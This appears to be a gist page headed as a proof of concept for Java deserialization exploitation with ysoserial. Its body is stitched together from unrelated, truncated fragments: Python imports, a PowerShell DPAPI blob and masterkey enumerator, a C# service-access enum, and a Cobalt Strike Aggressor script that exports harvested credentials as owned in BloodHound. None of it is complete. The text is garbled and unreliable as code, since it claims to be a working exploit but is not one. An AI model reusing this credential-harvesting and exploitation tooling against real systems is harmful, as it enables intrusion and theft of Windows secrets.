cube0x0 / poc.py
Created June 3, 2019 14:06
PoC for exploiting Java serialization with ysoserial when encryption is enabled
#!/usr/bin/python3
import hashlib
import os
import argparse
import base64
import pyDes
import gzip
import hmac
import requests
function Get-DPAPIBlobs {
<#
.SYNOPSIS
Author: Cube0x0
License: BSD 3-Clause
.DESCRIPTION
Enumerate DPAPI blobs and masterkeys
#>
[CmdletBinding()]
Param()
#https://rohnspowershellblog.wordpress.com/2013/03/19/viewing-service-acls/
Add-Type @"
[System.FlagsAttribute]
public enum ServiceAccessFlags : uint
{
QueryConfig = 1,
ChangeConfig = 2,
QueryStatus = 4,
EnumerateDependents = 8,
Start = 16,
# Registers an "Export As Owned" entry on the credentials popup menu.
# Choosing the entry passes the menu hook's first argument ($1) straight to
# the callback sub; nothing is filtered or validated here.
# NOTE(review): presumably $1 holds the credential rows selected in the
# credentials view; confirm against the Aggressor Script popup-hook docs.
popup credentials {
item "Export As Owned" {
callback($1);
}
}
sub callback {
local('$template')
$template = "Invoke-Neo4jQuery -Query \"MATCH (n:User) WHERE n.name = 'REPLACEME' SET n.owned = True\" ";
foreach $cred (credentials()) {